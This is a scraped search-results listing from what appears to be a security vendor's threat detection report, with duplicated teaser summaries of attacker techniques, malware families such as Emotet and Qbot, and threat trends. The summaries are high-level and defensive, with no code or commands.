68 results for ""
Search
TechniqueMulti-Factor Authentication Request Generation
Adversaries abuse MFA requests to log into valuable systems that are protected by second factors of authentication. To the surprise of many, some MFA implementations are susceptible to relatively unsophisticated social engineering attacks that could allow an adversary to impersonate victims and bypass security controls. Highly privileged identities are particularly juicy targets for adversaries seeking […]
Read More
Adversaries abuse MFA requests to log into valuable systems that are protected by second factors of authentication. To the surprise of many, some MFA implementations are susceptible to relatively unsophisticated social engineering attacks that could allow an adversary to impersonate victims and bypass security controls. Highly privileged identities are particularly juicy targets for adversaries seeking […]
Read MoreTechniqueSMB/Windows Admin Shares
Windows Admin Shares are enabled by default to allow administrators and software to remotely manage hosts on an internal network using the SMB protocol. These shares give adversaries the ability to stage payloads for execution, move laterally throughout a network, and elevate their privilege level. As is often the case with legitimate operating system utilities, […]
Read More
Windows Admin Shares are enabled by default to allow administrators and software to remotely manage hosts on an internal network using the SMB protocol. These shares give adversaries the ability to stage payloads for execution, move laterally throughout a network, and elevate their privilege level. As is often the case with legitimate operating system utilities, […]
Read MoreTechniqueMark-of-the-Web Bypass
Windows uses the Mark-of-the-Web (MotW) to indicate that a file originated from the Internet, which gives Microsoft Defender SmartScreen an opportunity to perform additional inspection of the content. MotW also supplies the basis for prompting a user with an additional prompt when high-risk extensions are opened. MotW is applied to a file by appending a […]
Read More
Windows uses the Mark-of-the-Web (MotW) to indicate that a file originated from the Internet, which gives Microsoft Defender SmartScreen an opportunity to perform additional inspection of the content. MotW also supplies the basis for prompting a user with an additional prompt when high-risk extensions are opened. MotW is applied to a file by appending a […]
Read MoreTechniqueSetuid and Setgid
Once an adversary gains access to a machine, they need to make sure they have enough permissions to persist, evade defensive controls, steal credentials, and more. Adversaries abuse setuid and setgid bits to elevate their privilege levels on macOS and Linux, potentially accessing both cloud-hosted and physical on-premise machines. With elevated privileges, adversaries can modify […]
Read More
Once an adversary gains access to a machine, they need to make sure they have enough permissions to persist, evade defensive controls, steal credentials, and more. Adversaries abuse setuid and setgid bits to elevate their privilege levels on macOS and Linux, potentially accessing both cloud-hosted and physical on-premise machines. With elevated privileges, adversaries can modify […]
Read MoreTechniqueGatekeeper Bypass
Adversaries attempt to bypass Apple’s Gatekeeper security checks in order to gain execution on a host. Since Gatekeeper’s introduction, the security control has hampered adversaries’ ability to execute untrusted code (i.e., code that does not conform to the system’s security policy). Adversaries may also circumvent the older File Quarantine feature and some of the high-level […]
Read More
Adversaries attempt to bypass Apple’s Gatekeeper security checks in order to gain execution on a host. Since Gatekeeper’s introduction, the security control has hampered adversaries’ ability to execute untrusted code (i.e., code that does not conform to the system’s security policy). Adversaries may also circumvent the older File Quarantine feature and some of the high-level […]
Read MoreTechniqueModify Registry
The registry being a generic database used by Windows for myriad purposes means that an adversary can use it for myriad purposes too. However, modification of the registry is a means to an end for executing other techniques. The following, non-exhaustive list comprises the various techniques that registry modification facilitates: Boot or Logon Autostart Execution […]
Read More
The registry being a generic database used by Windows for myriad purposes means that an adversary can use it for myriad purposes too. However, modification of the registry is a means to an end for executing other techniques. The following, non-exhaustive list comprises the various techniques that registry modification facilitates: Boot or Logon Autostart Execution […]
Read MoreTechniqueLSASS Memory
Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory. Upon starting up, LSASS contains valuable authentication data such as: encrypted passwords NT hashes […]
Read More
Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory. Upon starting up, LSASS contains valuable authentication data such as: encrypted passwords NT hashes […]
Read MoreTechniqueRename System Utilities
Adversaries rename system utilities to circumvent security controls and bypass detection logic that’s dependent on process names and process paths. Renaming system utilities allows an adversary to take advantage of tools that already exist on the target system and prevents them from having to deploy as many additional payloads after initially gaining access. Renaming a […]
Read More
Adversaries rename system utilities to circumvent security controls and bypass detection logic that’s dependent on process names and process paths. Renaming system utilities allows an adversary to take advantage of tools that already exist on the target system and prevents them from having to deploy as many additional payloads after initially gaining access. Renaming a […]
Read MoreTechniqueService Execution
Why do adversaries abuse Service Execution? All production operating systems have one thing in common: a mechanism to run a program or service continuously. On Windows, such a program is referred to as a “service,” and in the Unix/Linux world, such a program is often referred to as a “daemon.” Regardless of what operating system […]
Read More
Why do adversaries abuse Service Execution? All production operating systems have one thing in common: a mechanism to run a program or service continuously. On Windows, such a program is referred to as a “service,” and in the Unix/Linux world, such a program is often referred to as a “daemon.” Regardless of what operating system […]
Read MoreTechniqueProcess Injection
Why do adversaries use Process Injection? Note: Process Injection comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Process Injection is a versatile technique that adversaries leverage to perform a wide range of malicious activity. […]
Read More
Why do adversaries use Process Injection? Note: Process Injection comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Process Injection is a versatile technique that adversaries leverage to perform a wide range of malicious activity. […]
Read MoreTechniqueIngress Tool Transfer
Why do adversaries use Ingress Tool Transfer? Note: Ingress Tool Transfer has no sub-techniques. Administrative tooling and other native operating system binaries offer adversaries a rich array of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform […]
Read More
Why do adversaries use Ingress Tool Transfer? Note: Ingress Tool Transfer has no sub-techniques. Administrative tooling and other native operating system binaries offer adversaries a rich array of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform […]
Read MoreTechniqueRundll32
Why do adversaries use Rundll32? Like other prevalent ATT&CK techniques, Rundll32 is a native Windows process and a functionally necessary component of the Windows operating system that can’t be blocked or disabled without breaking things. Adversaries typically abuse Rundll32 because it makes it hard to differentiate malicious activity from normal operations. More often than not, […]
Read More
Why do adversaries use Rundll32? Like other prevalent ATT&CK techniques, Rundll32 is a native Windows process and a functionally necessary component of the Windows operating system that can’t be blocked or disabled without breaking things. Adversaries typically abuse Rundll32 because it makes it hard to differentiate malicious activity from normal operations. More often than not, […]
Read MoreTechniqueObfuscated Files or Information
Why do adversaries obfuscate files and information? Note: T1027 comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Adversaries employ obfuscation to evade simple, signature-based detection analytics and to impede analysis. Since software and IT […]
Read More
Why do adversaries obfuscate files and information? Note: T1027 comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Adversaries employ obfuscation to evade simple, signature-based detection analytics and to impede analysis. Since software and IT […]
Read MoreTechniqueWindows Management Instrumentation
Why do adversaries use WMI? Like many of the threats highlighted in this report, WMI is a native Windows feature that can be used on local or remote systems. Administrators regularly use WMI to: configure systems execute processes or scripts automate tasks What makes WMI useful to administrators also makes it attractive to adversaries. Note […]
Read More
Why do adversaries use WMI? Like many of the threats highlighted in this report, WMI is a native Windows feature that can be used on local or remote systems. Administrators regularly use WMI to: configure systems execute processes or scripts automate tasks What makes WMI useful to administrators also makes it attractive to adversaries. Note […]
Read MoreTechniquePowerShell
PowerShell is a versatile and flexible automation and configuration management framework built on top of the .NET Common Language Runtime (CLR), which expands its capabilities beyond other common command-line and scripting languages. PowerShell is included by default in modern versions of Windows, where it’s widely and routinely used by system administrators to automate tasks, perform […]
Read More
PowerShell is a versatile and flexible automation and configuration management framework built on top of the .NET Common Language Runtime (CLR), which expands its capabilities beyond other common command-line and scripting languages. PowerShell is included by default in modern versions of Windows, where it’s widely and routinely used by system administrators to automate tasks, perform […]
Read MoreTechniqueWindows Command Shell
Windows Command Shell is the native command-line interpreter (CLI) across every version of the Windows operating system. As utilitarian as it is ubiquitous, Windows Command Shell is one of the primary ways that adversaries interact with compromised systems. Unlike its more sophisticated and capable cousin, PowerShell, Windows Command Shell’s native feature set—i.e., commands that may […]
Read More
Windows Command Shell is the native command-line interpreter (CLI) across every version of the Windows operating system. As utilitarian as it is ubiquitous, Windows Command Shell is one of the primary ways that adversaries interact with compromised systems. Unlike its more sophisticated and capable cousin, PowerShell, Windows Command Shell’s native feature set—i.e., commands that may […]
Read MoreThreatPlugX
PlugX is a malware family observed in intrusions attributed to multiple operators at least as far back as 2008. Although researchers largely attribute compromises involving PlugX to espionage operators with ties to Chinese interests, notably Mustang Panda (which overlaps with the TA416 and RedDelta), there is speculation that PlugX source code has been circulated online […]
Read More
PlugX is a malware family observed in intrusions attributed to multiple operators at least as far back as 2008. Although researchers largely attribute compromises involving PlugX to espionage operators with ties to Chinese interests, notably Mustang Panda (which overlaps with the TA416 and RedDelta), there is speculation that PlugX source code has been circulated online […]
Read MoreThreatRaspberry Robin
Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog post published in May 2022. Following our blog post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial […]
Read More
Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog post published in May 2022. Following our blog post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial […]
Read MoreThreatGootloader
Gootloader is a JScript-based malware family that typically leverages SEO poisoning and compromised websites to lure victims into downloading a ZIP archive that poses as a document that the user has searched for. While we observed Gootloader detections in customer environments across multiple sectors in 2022, they almost always happened after victims accessed compromised websites […]
Read More
Gootloader is a JScript-based malware family that typically leverages SEO poisoning and compromised websites to lure victims into downloading a ZIP archive that poses as a document that the user has searched for. While we observed Gootloader detections in customer environments across multiple sectors in 2022, they almost always happened after victims accessed compromised websites […]
Read MoreThreatAdSearch
In early January 2022, multiple threat researchers began tweeting about a new threat, dubbed ChromeLoader, being delivered by malvertising links that delivered a malware dropper within an ISO image. Within the ISO, the ChromeLoader payload consisted of a .NET assembly, often named `CS_installer.exe` which in turn decoded and executed an obfuscated PowerShell script stored within […]
Read More
In early January 2022, multiple threat researchers began tweeting about a new threat, dubbed ChromeLoader, being delivered by malvertising links that delivered a malware dropper within an ISO image. Within the ISO, the ChromeLoader payload consisted of a .NET assembly, often named `CS_installer.exe` which in turn decoded and executed an obfuscated PowerShell script stored within […]
Read MoreThreatEmotet
Emotet is an advanced, modular trojan that primarily functions as a downloader or dropper of other malware. It’s disseminated through malicious email links or attachments that use branding familiar to the recipient. Emotet focuses on stealing user data and banking credentials, and opportunistically deploys itself to victims. Emotet is polymorphic, meaning it often evades typical […]
Read More
Emotet is an advanced, modular trojan that primarily functions as a downloader or dropper of other malware. It’s disseminated through malicious email links or attachments that use branding familiar to the recipient. Emotet focuses on stealing user data and banking credentials, and opportunistically deploys itself to victims. Emotet is polymorphic, meaning it often evades typical […]
Read MoreThreatYellow Cockatoo
Yellow Cockatoo is an activity cluster involving search engine poisoning to trick users into installing a .NET RAT with infostealer capabilities. First reported by Red Canary in 2020, Yellow Cockatoo has also garnered attention from other researchers, who track it under other names such as Jupyter and Solarmarker. After bursting onto the scene in 2020 […]
Read More
Yellow Cockatoo is an activity cluster involving search engine poisoning to trick users into installing a .NET RAT with infostealer capabilities. First reported by Red Canary in 2020, Yellow Cockatoo has also garnered attention from other researchers, who track it under other names such as Jupyter and Solarmarker. After bursting onto the scene in 2020 […]
Read MoreThreatGamarue
Gamarue, sometimes referred to as Andromeda or Wauchos, is a malware family used as part of a botnet. The variant of Gamarue that we observed most frequently in 2022 was a worm that spread primarily via infected USB drives. Gamarue has been used to spread other malware, steal information, and perform other activities such as […]
Read More
Gamarue, sometimes referred to as Andromeda or Wauchos, is a malware family used as part of a botnet. The variant of Gamarue that we observed most frequently in 2022 was a worm that spread primarily via infected USB drives. Gamarue has been used to spread other malware, steal information, and perform other activities such as […]
Read MoreThreatBloodHound
BloodHound is an open source tool that can be used to identify attack paths and relationships in an Active Directory (AD) environment. BloodHound made it into our top 10 threat rankings thanks to both testing activity and adversary use. It is popular among adversaries and testers because having information about an AD environment can enable […]
Read More
BloodHound is an open source tool that can be used to identify attack paths and relationships in an Active Directory (AD) environment. BloodHound made it into our top 10 threat rankings thanks to both testing activity and adversary use. It is popular among adversaries and testers because having information about an AD environment can enable […]
Read MoreThreatCobalt Strike
Cobalt Strike continues to be a favorite post-exploitation tool for adversaries. At #8, it is the only post-exploitation framework to make the top 10. Ransomware operators in particular rely substantially on Cobalt Strike’s core functionalities as they seek to deepen their foothold in their victims’ environments. Its speed, flexibility, and advanced features are likely contributing […]
Read More
Cobalt Strike continues to be a favorite post-exploitation tool for adversaries. At #8, it is the only post-exploitation framework to make the top 10. Ransomware operators in particular rely substantially on Cobalt Strike’s core functionalities as they seek to deepen their foothold in their victims’ environments. Its speed, flexibility, and advanced features are likely contributing […]
Read MoreThreatMimikatz
Mimikatz is an open source credential-dumping utility that was initially developed in 2007 by Benjamin Delpy to abuse various Windows authentication components. While the initial v0.1 release was oriented towards abusing already well established “Pass The Hash” attacks, after expanding its library of abuse primitives, the tool was publicly released as Mimikatz v1.0 in 2011. […]
Read More
Mimikatz is an open source credential-dumping utility that was initially developed in 2007 by Benjamin Delpy to abuse various Windows authentication components. While the initial v0.1 release was oriented towards abusing already well established “Pass The Hash” attacks, after expanding its library of abuse primitives, the tool was publicly released as Mimikatz v1.0 in 2011. […]
Read MoreThreatSocGholish
SocGholish is a malware family that leverages drive-by-downloads masquerading as software updates for initial access. Active since at least April 2018, SocGholish has been linked to the suspected Russian cybercrime group Evil Corp. As in past years, Red Canary observed SocGholish impacting a wide variety of industry verticals in 2022. We observed a spike in […]
Read More
SocGholish is a malware family that leverages drive-by-downloads masquerading as software updates for initial access. Active since at least April 2018, SocGholish has been linked to the suspected Russian cybercrime group Evil Corp. As in past years, Red Canary observed SocGholish impacting a wide variety of industry verticals in 2022. We observed a spike in […]
Read MoreThreatImpacket
At its core, Impacket is a collection of Python libraries that plug into applications like vulnerability scanners, allowing them to work with Windows network protocols. These Python classes are used in multiple tools to facilitate command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI). Oftentimes the popular Python scripts `smbexec`, `wmiexec`, or […]
Read More
At its core, Impacket is a collection of Python libraries that plug into applications like vulnerability scanners, allowing them to work with Windows network protocols. These Python classes are used in multiple tools to facilitate command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI). Oftentimes the popular Python scripts `smbexec`, `wmiexec`, or […]
Read MoreThreatQbot
Also known as “Qakbot,” the Qbot banking trojan has been active since at least 2007. Initially focused on stealing user data and banking credentials, Qbot’s functionality has expanded to incorporate features such as follow-on payload delivery, command and control (C2) infrastructure, and anti-analysis capabilities. Qbot is typically delivered via an email-based distribution model, and in […]
Read More
Also known as “Qakbot,” the Qbot banking trojan has been active since at least 2007. Initially focused on stealing user data and banking credentials, Qbot’s functionality has expanded to incorporate features such as follow-on payload delivery, command and control (C2) infrastructure, and anti-analysis capabilities. Qbot is typically delivered via an email-based distribution model, and in […]
Read MoreTrendAdversary emulation and testing
Customers are testing more and emulating the same techniques that adversaries abuse, but differences in tooling and tradecraft can limit effectiveness. Threat emulation activity increased significantly in 2022, and customers mostly tested the same techniques we observed adversaries abusing in the wild. Despite this, our security operations team finds that differentiating test detections from real-world […]
Read More
Customers are testing more and emulating the same techniques that adversaries abuse, but differences in tooling and tradecraft can limit effectiveness. Threat emulation activity increased significantly in 2022, and customers mostly tested the same techniques we observed adversaries abusing in the wild. Despite this, our security operations team finds that differentiating test detections from real-world […]
Read MoreTrendIdentity attacks
Adversaries are sparking all sorts of identity crises by intercepting MFA requests and other user authentication mechanisms. Users continue to be the weakest link in the initial chains of compromise we investigate. Virtual identities used by humans are the critical enabler of breaches that lead to intellectual property theft, ransomware, and cryptomining, to name just […]
Read More
Adversaries are sparking all sorts of identity crises by intercepting MFA requests and other user authentication mechanisms. Users continue to be the weakest link in the initial chains of compromise we investigate. Virtual identities used by humans are the critical enabler of breaches that lead to intellectual property theft, ransomware, and cryptomining, to name just […]
Read MoreTrendStealers
Stealer malware—such as RedLine, Raccoon, and Vidar—enabled some of the highest-profile breaches in 2022. The last few years have seen organizations embrace remote work and technologies that allow employees to work outside the traditional perimeter of an enterprise network. Technologies that allow this kind of work to occur include VPNs, remote access solutions, web applications, […]
Read More
Stealer malware—such as RedLine, Raccoon, and Vidar—enabled some of the highest-profile breaches in 2022. The last few years have seen organizations embrace remote work and technologies that allow employees to work outside the traditional perimeter of an enterprise network. Technologies that allow this kind of work to occur include VPNs, remote access solutions, web applications, […]
Read MoreTrendEmail threats
Spearphishing, Business Email Compromise (BEC), and Email Account Compromise (EAC) attacks continue to silently menace businesses across the globe, steadily outpacing damages inflicted by other attacks such as ransomware. Adversaries traditionally rely on social engineering schemes that allow them to trick unsuspecting users into facilitating payment fraud, disclosing sensitive information, or installing malware. Social engineering […]
Read More
Spearphishing, Business Email Compromise (BEC), and Email Account Compromise (EAC) attacks continue to silently menace businesses across the globe, steadily outpacing damages inflicted by other attacks such as ransomware. Adversaries traditionally rely on social engineering schemes that allow them to trick unsuspecting users into facilitating payment fraud, disclosing sensitive information, or installing malware. Social engineering […]
Read MoreTrendCommand and control frameworks
Commercial and open source post-exploitation frameworks save red teamers time on custom development and allow them to quickly change TTPs in their engagements. Not surprisingly, adversaries also find them attractive due to their ease of use and flexibility. Adversaries have long used open source and leaked versions of commercial frameworks, most notably Metasploit and Cobalt […]
Read More
Commercial and open source post-exploitation frameworks save red teamers time on custom development and allow them to quickly change TTPs in their engagements. Not surprisingly, adversaries also find them attractive due to their ease of use and flexibility. Adversaries have long used open source and leaked versions of commercial frameworks, most notably Metasploit and Cobalt […]
Read MoreTrendInitial access tradecraft
In 2022 we saw major malware campaigns leverage vintage tradecraft in new ways, experimenting with delivery vehicles and file types in an attempt to evade detection. Weaponized Microsoft documents and malicious macros waned in favor of evil binaries hidden within nested layers of container files and compressed archives. Adversaries manipulated search engine ads and results […]
Read More
In 2022 we saw major malware campaigns leverage vintage tradecraft in new ways, experimenting with delivery vehicles and file types in an attempt to evade detection. Weaponized Microsoft documents and malicious macros waned in favor of evil binaries hidden within nested layers of container files and compressed archives. Adversaries manipulated search engine ads and results […]
Read MoreTrendRansomware
The ransomware landscape continued to shift in 2022. While some metrics suggested that ransomware was less prevalent, other metrics suggested that ransomware was more prevalent for specific sectors. The community observed new ransomware groups popping up, while others disappeared. Regardless of the exact numbers, ransomware continues to be one of the most pressing threats to […]
Read More
The ransomware landscape continued to shift in 2022. While some metrics suggested that ransomware was less prevalent, other metrics suggested that ransomware was more prevalent for specific sectors. The community observed new ransomware groups popping up, while others disappeared. Regardless of the exact numbers, ransomware continues to be one of the most pressing threats to […]
Read More